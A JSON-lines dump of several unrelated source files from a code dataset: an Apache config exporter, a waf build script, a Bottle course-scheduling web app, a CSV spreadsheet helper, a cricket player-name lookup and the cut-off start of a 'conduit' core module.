Ingresa la ruta completa del archivo de configuración.\\n\")\n\"\"\"\nIP = \"192.168.216.145\"\nDOC = '/etc/apache2/sites-available/drupal.conf'\nDOC2 = '/etc/apache2/sites-available/drupal2.conf'\nbackUP(DOC,\"sitio1\")\n#backUP(DOC2,\"sitio2\")\nexportSiteConfig(IP,DOC,DOC2)\nprint(\"\\nSe termino de enviar los archivos de configuracion.\")","sub_path":"Herramienta/exportador.py","file_name":"exportador.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176219748","text":"\ndef build(bld):\n defines = ''\n features = []\n if bld.options.submission:\n defines = 'ONLINE_JUDGE'\n\n bld.program(features = 'cxx programrunner',\n use = 'gtest',\n uselib = 'pthread',\n include = ['.'],\n source = bld.path.ant_glob('*.cxx'),\n defines = defines,\n target = 'BridgeHandEvaluator')\n\n","sub_path":"uva/challenges/BridgeHandEvaluator/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"534587478","text":"from bottle import route, run\nfrom bottle import template,request\nfrom bottle import static_file\n\nfrom model.course \t import course\nfrom model.professor import professor\nfrom model.teach \t import teach\nfrom model.schedule import schedule\nfrom model.exeSQL \t import execute_sql\nfrom model.student \t import student\nfrom model.room \t import room\n\n# ***************************** ********************************* #\n\n# ***************************** Static Files ********************************* #\n@route('/js/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/js', mimetype='text/script')\n\n@route('/jquery-ui/js/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/js', mimetype='text/script')\n\n@route('/jquery-ui/dist/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/dist', mimetype='text/script')\n\n@route('/css/')\ndef server_static_css(filename):\n\treturn static_file(filename, root='./static/css', mimetype='text/css')\n\n@route('/jquery-ui/development-bundle/themes/base/')\ndef server_static_css(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/themes/base', mimetype='text/css')\n\n@route('/jquery-ui/development-bundle/ui/')\ndef server_static_js(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/ui', mimetype='text/script')\n\n@route('/jquery-ui/development-bundle/themes/base/images/')\ndef server_static_image(filename):\n\treturn static_file(filename, root='./static/jquery-ui/development-bundle/themes/base/images', mimetype='image/png')\t\n\n@route('/image/')\ndef server_static_image(filename):\n\treturn static_file(filename, root='./static/image', mimetype='image/png')\t\n\t\n# ***************************** global variables ********************************* #\t\nexesql = execute_sql()\nsch_table = schedule(exesql)\nstudent = student(exesql)\nroom = room(exesql)\ncrs = course(exesql)\nprof = professor(exesql)\ntch = teach(exesql)\n\n# ***************************** Routers ********************************* #\n\n@route('/', method=\"GET\")\ndef CourseSchedule():\n\treturn template('CourseSchedule')\n\n# ***************************** scheduling ********************************* #\n\n@route('/pust_schedule')\ndef schedule():\n\treturn template('show_table', 
ttable=sch_table.schedule())\t\n\n@route('/timetable')\ndef get_timetable():\n\treturn template('show_table', ttable=sch_table.get_timetable())\t\n\n@route('/print_table')\ndef print_table():\n\tsch_table.print_table()\n\treturn '', get_timetable()\n\n# ***************************** Student CRUD ********************************* #\t\n\n@route('/student', method=\"GET\")\ndef list_class():\n\treturn template('student',rows = student.search_class_([]))\t\n\n@route('/add_stdnt',method = \"GET\")\ndef new_class():\n\treturn template('student_crud', ID = '', fac = '', maj = '', yea = '0', num = '', rooms = '', flg_modify = 0)\t\n\n@route('/add_stdnt/main', method = \"GET\")\ndef new_class_main():\n\tnew_item =[]\n\tnew_item.append(request.GET.get('s_fclt','').strip())\n\tnew_item.append(request.GET.get('s_major','').strip())\n\tnew_item.append(request.GET.get('s_entyr','').strip())\n\tnew_item.append(request.GET.get('s_num','').strip())\n\tnew_item.append(request.GET.get('s_rnum','').strip())\n\n\tresult_flag = student.new_class_(new_item)\n\n\tif result_flag == -1:\n\t\treturn ''\n\telse:\n\t\treturn template('student',rows = student.search_class_([]))\t\n\n@route('/modify_student/:s_id/:faculty/:major/:year/:number/:room', method = 'GET')\ndef modify_class(s_id,faculty,major,year,number,room ):\n\t'''processing the strings'''\n\ts_id = s_id.strip(':')\n\tfaculty = faculty.strip(':')\n\tmajor = major.strip(':')\n\tyear = year.strip(':')\n\tnumber = number.strip(':')\n\troom = room.strip(':')\n\t\n\treturn template('student_crud', ID = s_id, fac = faculty, maj = major, yea = year, num = number, rooms = room, flg_modify = 1)\n\n@route('/modify_student/update/:ID', method='GET')\ndef update_class(ID):\n\t#put the item in the list\n\tupdate_item = []\n\ts_ID = ID.strip(':')\n\tupdate_item.append(s_ID)\n\tupdate_item.append(request.GET.get('s_fclt','').strip())\n\tupdate_item.append(request.GET.get('s_major','').strip())\n\tupdate_item.append(request.GET.get('s_entyr','').strip())\n\tupdate_item.append(request.GET.get('s_num','').strip())\n\tupdate_item.append(request.GET.get('s_rnum','').strip())\n\tstudent.update(update_item)\n\treturn list_class()\n\n@route('/modify_student/delete/:ID', method='GET')\ndef delete_class(ID):\n\tresult = student.delete(ID.strip(':'))\n\tif result == False:\n\t\treturn '', list_class()\n\telse:\n\t\treturn list_class()\n\n# ***************************** Co-room CRUD ********************************* #\n\n@route('/co_room', method=\"GET\")\ndef list_room():\n\treturn template('co_room',rows = room.search_room_([]))\n\n@route('/co_room_add',method = \"GET\")\ndef new_room():\n\t'''inserting new items'''\n\treturn template('croom_crud', no = '', size= '', typ = '',pos = '', flg_modify = 0)\n\t\n@route('/co_room_add/main',method = \"GET\")\ndef new_room_main():\n\tnew_item =[]\n\tnew_item.append(request.GET.get('rm_no','').strip())\n\tnew_item.append(request.GET.get('rm_cpct','').strip())\n\tnew_item.append(request.GET.get('rm_type','').strip())\n\tnew_item.append(request.GET.get('rm_pos','').strip())\n\t\n\tresult_flag = room.new_room_(new_item)\n\tif result_flag == -1 :\n\t\treturn '
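# Sketch: the handlers below strip(':') from every captured value, presumably
# because the template links embed literal colons; a minimal route of the same
# shape with old-style bottle :name wildcards (illustrative names only):
from bottle import route

@route('/item/:item_id')
def show_item(item_id):
    return 'item %s' % item_id.strip(':')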

The new data was inserted in the room table'\n\telif result_flag == 0:\n\t\treturn 'There are some problems in the data'\n\telse:\n\t\treturn list_room()\n\n@route('/co_room_modify/:r_no/:r_size/:r_type/:r_pos', method = 'GET')\ndef modify_room(r_no, r_size, r_type, r_pos):\n\tr_no = r_no.strip(':')\n\tr_size = r_size.strip(':')\n\tr_type = r_type.strip(':')\n\tr_pos = r_pos.strip(':')\n\treturn template('croom_crud', no = r_no, size = r_size, typ = r_type, pos = r_pos, flg_modify = 1)\n\n@route('/modify_room/update/:no', method='GET')\ndef update_room(no):\n\tupdate_item = []\n\tupdate_item.append(no.strip(':'))\n\tupdate_item.append(request.GET.get('rm_cpct','').strip())\n\tupdate_item.append(request.GET.get('rm_type','').strip())\n\tupdate_item.append(request.GET.get('rm_pos','').strip())\n\n\tresult_flag = room.update_room_(update_item)\n\n\tif result_flag:\n\t\treturn list_room()\n\telse:\n\t\treturn 'Errors in updating co-room information!
'\n\n\t\n@route('/modify_room/delete/:no', method='GET')\ndef delete_room(no):\n\tdelete_item = no.strip(':')\n\tresult_flag = room.delete_room_(delete_item)\n\t\n\tif result_flag:\n\t\treturn list_room()\n\telse:\n\t\treturn template('fail')\n\n# ***************************** Course CRUD ********************************* #\n\n@route('/course', method = \"GET\")\ndef course_list():\n\t\"\"\"This function shows all the courses which has been taken and will be taken in connection with database. \"\"\"\n\tresult = crs.course_list()\n\treturn template('course', rows = result)\n\n#######################################################################################\n\"\"\" Add a new Course with vID, Title, totalHours, lectureHours, recitationHours, labHours\"\"\"\n#######################################################################################\n@route('/course_create', method = 'GET')\ndef course_create():\n\t\"\"\"This function would create a new course which has Title, total Hours, lecture Hours, rectiation Hourse, lab Hours.\n\tIt is noticed that the course which has the same either vId or title could not create.\n\t\"\"\"\n\treturn template('course_create')\n\t\n@route('/course_create/create', method = 'GET')\ndef course_create_create():\t\n\tc_vId = request.GET.get('c_vId', '').strip()\n\tc_Title = request.GET.get('c_Title', '').strip()\n\tc_tHours = request.GET.get('c_tHours', '').strip()\n\tc_lHours = request.GET.get('c_lHours', '').strip()\n\tc_rHours = request.GET.get('c_rHours', '').strip()\n\tc_labHours = request.GET.get('c_labHours', '').strip()\n\t\n\tresult = crs.course_create_create(c_Title, c_tHours, c_lHours, c_rHours, c_labHours, c_vId)\n\tif result == True:\n\t\treturn course_list()\n\telse:\n\t\treturn '', template('course_create')\n\t\t#return template('course_create')\n\t\n##########################################################################################\n\"\"\" Modify the Course with Title, totalHours, lectureHours, recitationHours, labHours \"\"\"\n##########################################################################################\t\t\n@route('/course_modify/:course_Id/:course_vId/:course_Title/:course_tHours/:course_lHours/:course_rHours/:course_labHours', method = 'GET')\ndef course_modify(course_Id, course_vId, course_Title, course_tHours, course_lHours, course_rHours, course_labHours):\n\t\"\"\"This function is to modify the given course such as update or delete.\"\"\"\n\tc_id = course_Id.strip(':')\n\tc_vid = course_vId.strip(':')\n\tc_Title = course_Title.strip(':')\n\tc_tHours = course_tHours.strip(':')\n\tc_lHours = course_lHours.strip(':')\n\tc_rHours = course_rHours.strip(':')\n\tc_labHours = course_labHours.strip(':')\n\t\n\treturn template('course_modify', ID = c_id, vId = c_vid, title = c_Title, tHours = c_tHours , lHours = c_lHours, rHours = c_rHours, labHours = c_labHours)\n\n#######################Update information of the specific course####################\n@route('/course_modify/update/:ID', method = 'GET')\ndef course_update(ID):\n\t\"\"\"This function implements to update the specific course with certain options.\"\"\"\n\tc_Id = ID.strip(':')\n\tc_Title = request.GET.get('c_Title','').strip()\n\tc_tHours = request.GET.get('c_tHours','').strip()\n\tc_lHours = request.GET.get('c_lHours','').strip()\n\tc_labHours = request.GET.get('c_labHours','').strip()\n\tc_rHours = request.GET.get('c_rHours','').strip()\n\tc_vId = request.GET.get('c_vId','').strip()\n\t\n\tresult = crs.course_update(c_Id, c_vId, c_Title, c_tHours, c_lHours, 
c_rHours, c_labHours)\n\treturn course_list()\n\n#######################Delete information of the specific course####################\t\n@route('/course_modify/delete/:ID', method = 'GET')\ndef course_delete(ID):\n\t\"\"\"Delete the given course; the course should not be part of an ongoing lecture.\"\"\"\n\tc_Id = ID.strip(':')\n\n\t# crs.course_delete returns a status flag, but the response is the same either way.\n\tcrs.course_delete(c_Id)\n\treturn '', course_list()\n\n# ***************************** Professor CRUD ********************************* #\n\n@route('/professor')\ndef prof_list():\n\t\"\"\"List all the professors stored in the database.\"\"\"\n\tresult = prof.prof_list()\n\treturn template('professor', rows = result)\n\n#######################################################################################\n\"\"\" Add a new Professor with his Name, his Preference for lectures \"\"\"\n#######################################################################################\t\n@route('/prof_create', method = 'GET')\ndef prof_create():\n\t\"\"\"Create a new professor with a name and a lecture preference.\n\tNote that a professor with a duplicate name cannot be created.\n\t\"\"\"\n\treturn template('prof_crud', ID = 0, name = '', pref = '', flg_modify = 0)\n\n@route('/prof_create/create', method = 'GET')\ndef prof_create_create():\n\tp_Name = request.GET.get('p_Name', '').strip()\n\tp_Pref = request.GET.get('p_Pref', '').strip()\n\tresult = prof.prof_create_create(p_Name, p_Pref)\n\tif result == True:\n\t\treturn prof_list()\n\telse:\n\t\treturn '', template('prof_create')\n\n##########################################################################################\n\"\"\" Modify the Professor with his Name and his Preference \"\"\"\n##########################################################################################\t\n@route('/prof_modify/:prof_Id/:prof_name/:prof_pref', method = 'GET')\ndef prof_modify(prof_Id, prof_name, prof_pref):\n\t\"\"\"Open the given professor for modification (update or delete).\"\"\"\n\tp_id = prof_Id.strip(':')\n\tp_name = prof_name.strip(':')\n\tp_pref = prof_pref.strip(':')\n\treturn template('prof_crud', ID = p_id, name = p_name, pref = p_pref, flg_modify = 1)\n\n#######################Update information of the specific professor####################\n@route('/prof_modify/update/:ID', method='GET')\ndef prof_update(ID):\n\t\"\"\"Update the given professor with the submitted name and preference.\"\"\"\n\tp_Id = ID.strip(':')\n\tp_Pref = request.GET.get('p_Pref','').strip()\n\tp_Name = request.GET.get('p_Name','').strip()\n\n\tresult = prof.prof_update(p_Id, p_Name, p_Pref)\n\treturn prof_list()\n\n#######################Delete information of the specific professor####################\t\n@route('/prof_modify/delete/:ID', method='GET')\ndef prof_delete(ID):\n\t\"\"\"Delete the given professor; the professor should not be lecturing a course.\"\"\"\n\tp_Id = ID.strip(':')\n\n\t# prof.prof_delete returns a status flag, but the response is the same either way.\n\tprof.prof_delete(p_Id)\n\treturn '', prof_list()\n\n# ***************************** Teach CRUD ********************************* #\n\n@route('/teach')\ndef teach_list():\n\t\"\"\"This function shows all the schedules stored in the 
database. \"\"\"\n\tresult = tch.teach_list() \n\treturn template('teach', schedule = result)\n\n############################################################################################\n\"\"\" Add a new Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n############################################################################################\n@route('/teach_choose')\ndef teach_choose():\n\t\"\"\"This function would create a new schedule with coures title, professor name, student, and duration.\"\"\"\n\tupdate_item = tch.teach_choose() \n\treturn template('teach_create', update = update_item) \n \n@route('/teach_create')\ndef teach_create():\t\n\tcourse = request.GET.get('course', '').strip()\n\tprofessor = request.GET.get('professor', '').strip()\n\tstudent = request.GET.get('student', '').strip()\n\tstart = request.GET.get('stdate', '').strip()\n\tfinish = request.GET.get('fndate', '').strip()\n\t\t\n\tresult = tch.teach_create(course, professor, student, start, finish)\t\n\tif result == True:\n\t\treturn teach_list()\n\telse:\n\t\treturn '', template('teach_create')\n\n###############################################################################################\n\"\"\" Modify a new Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\n@route('/teach_modify/:t_Id')\ndef teach_modify(t_Id):\n\t\"\"\"This function is to modify the given schedule such as update or delete.\"\"\"\n\tt_id = t_Id.strip(':')\n\t\n\tupdate_item = tch.teach_modify(t_id)\n\treturn template('teach_modify', t_Id = t_id, update = update_item)\n\t\n###############################################################################################\n\"\"\" Update the Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\n@route('/teach_modify/update/:t_id', method='GET')\ndef teach_update(t_id):\n\t\"\"\"This function implements to update the specific schedule with certain options.\"\"\"\n\tt_Id = t_id.strip(':')\t\n\tc_Id = request.GET.get('course', '').strip()\n\tp_Id = request.GET.get('professor', '').strip()\n\ts_Id = request.GET.get('student', '').strip()\n\tstart = request.GET.get('stdate', '').strip()\n\tfinish = request.GET.get('fndate', '').strip()\n\t\n\tresult = tch.teach_update(t_Id, c_Id, p_Id, s_Id, start, finish)\n\treturn teach_list()\n###############################################################################################\n\"\"\" Delete the Schedule with CourseTitle, ProfessorName, Student Year and Major, Duration \"\"\"\n###############################################################################################\t\t\n@route('/teach_modify/delete/:ID', method='GET')\ndef teach_delelte(ID):\n\t\"\"\"This function make a progress to delete the specific schdule.\"\"\"\n\tt_Id = ID.strip(':')\n\t\n\tresult = tch.teach_delete(t_Id)\n\treturn teach_list()\t\t\n\t\nif __name__ =='__main__':\n\trun(host='0.0.0.0', port = 7756, reloader = 'TRUE')\n","sub_path":"CourseSchedule.py","file_name":"CourseSchedule.py","file_ext":"py","file_size_in_byte":17117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"72601533","text":"# !/usr/bin/env python\n\n\"\"\"Spreadsheet\nOpens a CSV spreadsheet for reading and searching operations.\nIdeas: pickle handling with __call__ 
&& __init__, print formatting,\n\"\"\"\nfrom prettytable import PrettyTable\nfrom pathlib import Path\nimport csv\n\n# Programs author information\n__author__ = \"Mauricio Lomeli\"\n__date__ = \"8/22/2019\"\n__credits__ = [\"Rebecca Zhuo, Smruti Vidwans\"]\n__license__ = \"MIT\"\n__version__ = \"0.0.0.1\"\n__maintainer__ = \"Mauricio Lomeli\"\n__email__ = \"mjlomeli@uci.edu\"\n__status__ = \"Prototype\"\n\n\n# default required values\nPATH = Path.cwd()\n_DEFAULT_SPREADSHEET = PATH / Path(\"data\") / Path(\"insights.csv\")\n_DEFAULT_TEXT_LENGTH = 30\n\nCATEGORIES = [\"Comparing Therapies\", \"Side Effects\", \"Right treatment?\", \"Specific Therapy Inquiries\",\n \"Others' experience\", 'Symptoms diagnosis', 'Side effect management', 'Recurrence Queries',\n 'Specific Conditions', 'Data interpretation', 'Referral', 'Lifestyle', 'Positive Affirmations',\n 'Encouragement', 'Inter-Personal Patient Connections', 'Other/ Miscellaneous']\nSTAGES = ['Stage 0', 'Stage 1', 'Stage 1A', 'Stage 1B', 'Stage 2', 'Stage 2A',\n 'Stage 2B', 'Stage 3', 'Stage 3A', 'Stage 3B', 'Stage 3C', 'Stage 4']\n\n_NORM_HEADERS = {'id': 'id', 'Topic': 'topic', 'Date Discussion (Month/Year)': 'date', 'Query Tag': 'query_tag',\n 'Patient Query/inquiry': 'query', 'Specific Patient Profile': 'profile',\n 'Patient Cohort (Definition)': 'cohort', 'Tumor (T)': 'tumor', 'Tumor Count': 'tumor_count',\n 'Node (N)': 'node', 'Metastasis (M)': 'metastasis', 'Grade': 'grade', 'Recurrence': 'recurrence',\n 'Category Tag': 'category', 'Intervention': 'intervention', 'Associated Side effect': 'side_effects',\n 'Intervention mitigating side effect': 'int_side_effects', 'Patient Insight': 'insights',\n 'Volunteers': 'volunteers', 'Discussion URL': 'url', 'HER2': 'HER2', 'HER': 'HER', 'BRCA': 'BRCA',\n 'ER': 'ER', 'HR': 'HR', 'PR': 'PR', 'RP': 'RP', 'RO': 'RO'}\n_NODE_HEADER = {'id': 'ID', 'topic': 'Topic', 'date': 'Date', 'query_tag': 'Query Tag', 'query': 'Query',\n 'profile': 'Profile', 'cohort': 'Cohort', 'tumor': 'T', 'tumor_count': 'T Count', 'node': 'N',\n 'metastasis': 'M', 'grade': 'Grade', 'recurrence': 'Recurr', 'category': 'Category',\n 'intervention': 'Intervention', 'side_effects': 'Side Effect', 'int_side_effects': 'Int. Side Eff.',\n 'insights': 'Insights', 'volunteers': 'Volunt.', 'url': 'URL', 'HER2': 'HER2', 'HER': 'HER',\n 'BRCA': 'BRCA', 'ER': 'ER', 'HR': 'HR', 'PR': 'PR', 'RP': 'RP', 'RO': 'RO'}\n\n\n\nclass Spreadsheet:\n \"\"\"\n If DEFAULT_SPREADSHEET and NORM_HEADERS are kept, 'Patient Insights - Insights.csv' will\n be the CSV that it will be reading. Else, replace with a file in the same directory or specified path.\n NORM_HEADERS truncates the fieldnames to a single word without spaces, this is important if integrating\n with flask (can't use the . function on variables with white space).\n Ex:\n from Spreadsheet import Spreadsheet\n sheet = Spreadsheet()\n sheet = Spreadsheet('Patient Insights - Insights.csv')\n sheet = Spreadsheet('Patient Insights - Insights.csv', NORM_HEADERS) # assume NORM_HEADERS is defined\n sheet['topic'] = ['About to start Radiation ... Need advice on what to expect', 'Afinitor T...\n sheet[0] = ['About to start Radiation ... Need advice on what to expect', 'Dec 2016...\n [row for row in sheet] -> [['About to start Radiation ... 
Need advice on what to expect', 'Dec 2016', 'what...\n 'topic' in sheet\n 'August 2018' in sheet\n print(sheet)\n \"\"\"\n def __init__(self, spreadsheet=_DEFAULT_SPREADSHEET, headers=_NORM_HEADERS):\n self.smart_sheet = []\n self.name = spreadsheet\n self.real_headers = None\n self.__norm_headers = headers\n self.headers = None\n self.__book = None\n self.__spreadsheet = []\n self.__index = 0\n if spreadsheet is not None:\n self.__assemble(spreadsheet)\n if self.__norm_headers is not None:\n self.__normalize(headers)\n else:\n self.headers = self.real_headers\n self.testing = False\n\n def keys(self):\n return self.headers\n\n def exists(self, item=None):\n if item is None:\n return self.__spreadsheet is not None\n else:\n return self.has(item)\n\n def has(self, item):\n if isinstance(item, str):\n if item in self.headers or item in self.real_headers:\n return True\n else:\n for rows in self.__spreadsheet:\n if item in rows:\n return True\n return False\n elif isinstance(item, list):\n if len(item) == 0:\n return False\n elif isinstance(item[0], str):\n items_non_headers = [e for e in item if e not in self.headers and e not in self.real_headers]\n result = dict(zip(items_non_headers, [False]*len(items_non_headers)))\n for rows in self.__spreadsheet:\n for element in items_non_headers:\n if element in rows:\n result[element] = True\n if all(result.values()):\n return True\n return False\n else:\n return self.__has_all(item)\n elif isinstance(item, dict):\n if len(item) == 0:\n return False\n has_all = True\n for keys in item.values():\n if keys not in self.headers or keys not in self.real_headers:\n return False\n else:\n if isinstance(item[keys], list):\n for rows in item[keys]:\n if rows not in self[keys]:\n return False\n elif isinstance(item[keys], str):\n if not item[keys] in self[keys]:\n return False\n return has_all\n else:\n return False\n\n def __at(self, item):\n #TODO: get the index of an item\n #TODO: if entire row matches, get the row index\n #TODO: if only one field matches, get the row,column tuple\n #TODO: if part of the field matches, get the sliced ([:,1] or [2,4])\n #TODO: to return slice, return s = slice(2, 4) or return (s.start, s.stop)\n return None\n\n def getColumn(self, fieldname):\n return [item[self.__book[fieldname]] for item in self.__spreadsheet]\n\n def find(self, value):\n return [rows for rows in self.__spreadsheet if value in rows]\n\n def convertToDict(self, item=None):\n if item is None:\n columns = [self[col] for col in self.headers]\n return dict(zip(self.headers, columns))\n elif isinstance(item, list) and len(item) > 0:\n if isinstance(item[0], list) and len(item[0]) > 0:\n return [dict(zip(self.headers, value)) for value in item]\n elif not isinstance(item[0], list):\n return dict(zip(self.headers, item))\n return None\n\n def textLength(self, text, length=_DEFAULT_TEXT_LENGTH):\n if isinstance(text, list):\n return [value[:length] + '...' 
if len(value) > length else value for value in text]\n elif isinstance(text, str):\n if len(text) > length:\n return text[:length] + '...'\n else:\n return text\n else:\n return ''\n\n def max_results(self, min_value=4):\n omit = list(set(self['volunteers'] + self['comments'] + self['professor_comments']))\n items = set([x for element in self.__spreadsheet for x in element if x not in omit])\n dict_items = {}\n for element in items:\n length = len(self.find([element]))\n if length > min_value:\n if length not in dict_items:\n dict_items[length] = [element]\n else:\n dict_items[length].append(element)\n return dict_items\n\n def __like(self, string, compare):\n if len(string) > len(compare):\n added_len = abs(len(string) - len(compare))\n shortest = string if len(string) < len(compare) else compare\n compare = string if len(string) > len(compare) else compare\n string = list(shortest) + ([None] * added_len)\n combined = list(zip(compare, string))\n len_combined = len(combined)\n equality = sum([1 if elem[0] == elem[1] else 0 for elem in combined])\n return equality / len_combined\n\n def __contains_like(self, string, compare):\n equality = sum([1 if letter in compare else 0 for letter in string])\n return equality / len(string)\n\n def __intersection(self, raw, required, exact=False):\n result = []\n req = [elem.lower() for elem in required]\n raw = [elem.split(';') for elem in raw]\n for item in raw:\n adding = []\n for words in item:\n if len(words) > 0:\n if words.lower() in req:\n adding.append(words)\n elif not exact:\n words = words.lower().strip().replace('/', ' ').replace('\\n', ' ')\n for capital in req:\n tag = capital.lower()\n if tag not in adding:\n if words in tag:\n adding.append(tag)\n elif self.__like(words, tag) > 0.85:\n adding.append(tag)\n elif self.__contains_like(words, tag) > 0.85:\n div = 1.5\n end = int(len(words) // div)\n start = 0\n while end < len(words) and start < len(words):\n if words[start:end] in tag and tag not in adding:\n adding.append(tag)\n end += 1\n start += 1\n result.append(adding)\n return result\n\n def __has_all(self, item):\n has_all = True\n for index in item:\n if not self.has(index):\n return False\n return has_all\n\n def __assemble(self, spreadsheet):\n with open(Path(spreadsheet), 'r', newline=\"\", encoding=\"utf-8\") as f:\n content = csv.DictReader(f)\n self.real_headers = content.fieldnames\n self.__book = {header: index for index, header in enumerate(self.real_headers)}\n self.__spreadsheet = [list(element.values()) for element in content]\n\n def __normalize(self, headers):\n if headers is None:\n if self.real_headers == list(self.__norm_headers.values()):\n self.headers = list(self.__norm_headers.keys())\n else:\n if isinstance(headers, list):\n if len(headers) == len(self.real_headers):\n self.headers = headers\n elif isinstance(headers, dict):\n if list(headers.keys()) == self.real_headers:\n self.headers = list(headers.values())\n\n if self.headers is None:\n self.headers = self.real_headers\n self.__book = {head: index for index, head in enumerate(self.headers)}\n\n def __replace(self, arr, list_of_values):\n for i in range(len(arr)):\n for item in list_of_values:\n arr[i] = arr[i].lower().replace(*item)\n return arr\n\n def __contains__(self, item):\n return self.has(item)\n\n def __getitem__(self, item):\n if isinstance(item, str):\n if self.headers is not None and item in self.headers:\n return self.getColumn(item)\n elif item in self.real_headers:\n return self.getColumn(self.__norm_headers[item])\n else:\n return 
self.find(item)\n elif isinstance(item, tuple):\n pos1, pos2 = item\n if isinstance(pos1, str) and isinstance(pos2, str):\n return [element.values() for element in self.__spreadsheet if element[pos1] == pos2]\n elif isinstance(pos1, int) and isinstance(pos2, str):\n return self.__spreadsheet[pos1 - 1][pos2]\n elif isinstance(item, int) or isinstance(item, slice):\n return self.__spreadsheet[item]\n\n def __len__(self):\n return len(self.__spreadsheet)\n\n def __iter__(self):\n self.__index = 0\n return self\n\n def __next__(self):\n if self.__index >= len(self.__spreadsheet):\n raise StopIteration\n item = self.__spreadsheet[self.__index]\n self.__index += 1\n return item\n\n def __call__(self, spreadsheet=_DEFAULT_SPREADSHEET):\n with open(Path(spreadsheet), 'r', newline=\"\", encoding=\"utf-8\") as f:\n content = csv.DictReader(f)\n for element in content:\n temp = list(element.values())\n if temp not in self.__spreadsheet:\n self.__spreadsheet.append(temp)\n\n def __format__(self, format_spec):\n #TODO: \"Sheet has at columns topic: {a}\".format('column')\"\n pass\n\n def __str__(self):\n table = PrettyTable(['index'] + self.real_headers)\n for head in self.real_headers:\n table.align[head] = 'l'\n for i, content in enumerate(self.__spreadsheet):\n table.add_row([str(i)] + self.textLength(content))\n return str(table)\n\n\ndef main():\n try:\n message = \"Initializing with arguments: Spreadsheet(DEFAULT_SPREADSHEET, NORM_HEADERS)\"\n sheet = Spreadsheet(_DEFAULT_SPREADSHEET, _NORM_HEADERS)\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Initializing default constructor: Spreadsheet()\"\n sheet = Spreadsheet()\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Iterating through first 3 rows in Spreadsheet\"\n assert len(sheet[:3]) == 3\n for row in sheet[:3]:\n pass\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Find row with 'Specific Therapy Inquries'\"\n assert len(sheet['Specific Therapy Inquries']) > 0\n print('\\t' + str(sheet['Specific Therapy Inquries']))\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Find something that doesn't exist\"\n assert len(sheet['it shouldnt exist']) == 0\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"First item in the Spreadsheet\"\n print('\\t' + str(sheet[0]))\n print('\\033[1m' + '\\033[92m' + \"PASS: \" + message + '\\033[0m')\n\n message = \"Printing the table\"\n response = input(\"Would you like to print the table?\")\n if 'y' in response.lower():\n print(sheet)\n\n except Exception:\n print('\\033[1m' + '\\033[31m' + \"FAIL:\" + message + '\\033[0m')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Spreadsheet.py","file_name":"Spreadsheet.py","file_ext":"py","file_size_in_byte":15470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198053459","text":"#!/usr/bin/env python3\n\nimport pickle\n\ndef find_name(user_input, data_dir=\"./database/\", ipl=False, t20=False):\n user_input_lower = user_input.lower()\n\n if ipl:\n df_bat = pickle.load(open(data_dir+'03_ipl/batting.df', 'rb'))\n df_bowl = pickle.load(open(data_dir+'03_ipl/bowling.df', 'rb'))\n elif t20:\n df_bat = pickle.load(open(data_dir+'01_t20s/batting.df', 'rb'))\n df_bowl = pickle.load(open(data_dir+'01_t20s/bowling.df', 'rb'))\n\n all_batsman = list(df_bat['batsman'].values )\n all_bowlers = list(df_bowl['bowler'].values )\n\n 
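# A hedged example of the lookup order implemented below: an input like\n    # 'kohli' (assuming a 'V Kohli' row exists in the loaded dataframes) misses\n    # the exact and lowercase checks and resolves via the last-name dictionary.\n    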
all_player = list(set(all_batsman + all_bowlers ))\n \n all_player_lower = [x.lower() for x in all_player]\n lower_name_dict = {x.lower() : x for x in all_player}\n last_name_dict = {all_player_lower[i].split()[-1]: all_player[i] for i in range(len(all_player))}\n\n if user_input in all_player:\n return user_input\n elif user_input_lower in all_player_lower:\n return lower_name_dict[user_input_lower]\n elif user_input_lower in last_name_dict.keys():\n return last_name_dict[user_input_lower]\n return None\n\nif __name__==\"__main__\":\n\n user_input = \"Rohit Sharma\"\n name = find_name(user_input, t20=True)\n print (name)\n\n","sub_path":"find_name.py","file_name":"find_name.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"570972719","text":"#!/usr/bin/env python\n\n\"\"\"\n.. module:: core\n :synopsis: conduit core module\n\n\"\"\"\n\nfrom util import comparable_interface\nimport datetime\nimport random\nimport logging\nimport abc\nimport copy\nimport Queue\nimport isodate\n\nrandom.seed(0)\n\nSTART = isodate.parse_date('2010-03-01')\nDAY = datetime.timedelta(days=1)\nHOUR = datetime.timedelta(hours=1)\n\nWEIGHT = 50000000\n\nclass Data(comparable_interface.Comparable):\n \"\"\"\n The Data class acts as a struct containing user data and a timestamp. Data objects are passed from block to block\n by way of channels.\n \"\"\"\n\n def __init__(self, time, data):\n self.time = time\n self.data = data\n\n def __nonzero__(self):\n \"\"\"\n The validity of Data objects depends on them having a valid timestamp. This method defines the behavior\n when a Data object is referred to in a boolean context.\n \"\"\"\n return bool(self.time)\n\n def __repr__(self):\n return \"Data(time=\" + str(self.time) + \", data=\" + str(self.data) + \")\"\n\n def _cmpkey(self):\n \"\"\"\n Provided for the functionality in comparable_interface.\n Comparisons on Data objects will use the time field.\n So, for example, to get the Data object with the earliest 